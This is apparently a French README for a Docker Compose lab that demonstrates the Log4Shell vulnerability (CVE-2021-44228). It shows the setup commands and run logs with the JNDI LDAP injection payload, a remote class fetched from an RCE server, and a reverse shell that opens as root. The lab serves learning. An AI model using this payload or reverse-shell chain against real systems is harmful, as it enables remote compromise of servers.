
Environnement de laboratoire autonome qui exécute l'exploit en toute sécurité, le tout à partir de docker compose
Ceci est un environnement de laboratoire autonome qui exécute l'exploit en toute sécurité, le tout à partir de docker compose.
Les versions concernées sont Apache Log4j <=2.0–2.14.1 et la CVE est suivie sous le nom CVE-2021-44228 (score CVSS : 10.0).
Ce code nécessite Docker et Docker Compose.
Les fichiers Dockerfile et docker-compose.yml sont explicites pour construire et démarrer l'environnement de laboratoire.
Le serveur victime log4shell-server est construit à l'aide du projet de démonstration , incluant la version vulnérable Log4j 2.14.1 via .
Le code vulnérable se trouve dans DemoApplication.java.
L'exécution de code à distance est fournie par le rce-server.
Le serveur LDAP intermédiaire est basé sur Java Unmarshaller Security - Turning your data into code execution.
Le vecteur d'attaque est exécuté à partir de ce script pour établir une connexion vers le serveur reverse-shell.
Le serveur reverse-shell attend une connexion, puis envoie un exemple de commande echo $(whoami) via le reverse shell, qui est exécutée sur le serveur victime log4shell-server.
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
ldap-server | Listening on 0.0.0.0:1389
Serveur LDAP prêt et à l'écoute.
reverse-shell | listening on [::]:4242 ...
Serveur reverse-shell prêt et à l'écoute.
log4shell-server |
log4shell-server | . ____ _ __ _ _
log4shell-server | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
log4shell-server | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
log4shell-server | ' |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server | =========|_|==============|___/=/_/_/_/
log4shell-server | :: Spring Boot :: (v2.6.1)
log4shell-server |
log4shell-server | 2021-12-18 12:31:37.695 INFO 1 --- [ main] c.e.d.DemoApplication : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server | 2021-12-18 12:31:37.739 INFO 1 --- [ main] c.e.d.DemoApplication : No active profile set, falling back to default profiles: default
log4shell-server | 2021-12-18 12:31:42.337 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
log4shell-server | 2021-12-18 12:31:42.439 INFO 1 --- [ main] o.a.c.c.StandardService : Starting service [Tomcat]
log4shell-server | 2021-12-18 12:31:42.440 INFO 1 --- [ main] o.a.c.c.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server | 2021-12-18 12:31:42.717 INFO 1 --- [ main] o.a.c.c.C.[.[.[/] : Initializing Spring embedded WebApplicationContext
log4shell-server | 2021-12-18 12:31:42.718 INFO 1 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server | 2021-12-18 12:31:44.660 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
Serveur vulnérable prêt et à l'écoute.
attack-vector | 👌 log4shell-server:8080 is listening!
attack-vector | 🚀 Sending attack vector ...
Serveur d'attente de connexion et envoi du vecteur d'attaque.
log4shell-server | 2021-12-18 12:31:44.740 INFO 1 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.112 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 2 ms
ldap-server | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
Le serveur vulnérable exécute la requête, la journalise, donc le serveur LDAP demande l'exécution de code à distance au serveur RCE.
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell | 👻 Hello from the log4shell-server! We are root.
reverse-shell | listening on [::]:4242 ...
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
L'exécution de code à distance est effectuée et le serveur victime ouvre le reverse shell, le serveur reverse-shell peut alors exécuter des commandes distantes.
log4shell-server | 2021-12-18 12:31:45.187 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello param:name: ReverseShell@22fb868
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:host: log4shell-server:8080
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:user-agent: curl/7.80.0
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:accept: */*
Le serveur victime journalise la requête du vecteur d'attaque.
attack-vector | 🔥 Server returned:
attack-vector | > HTTP/1.1 200
attack-vector | > Content-Type: text/plain;charset=UTF-8
attack-vector | > Content-Length: 52
attack-vector | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector | >
attack-vector | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector | Attack should be successfull, have a nice day!
Le vecteur d'attaque journalise la réponse et quitte la fête.
Ce dépôt concerne uniquement l'apprentissage de la vulnérabilité.
Le projet n'est pas destiné à être et ne peut pas être utilisé comme une exploitation malveillante de la CVE-2021-44228 sans le consentement du propriétaire du serveur victime.
Toute utilisation à des fins malveillantes est interdite et punie par des lois sévères.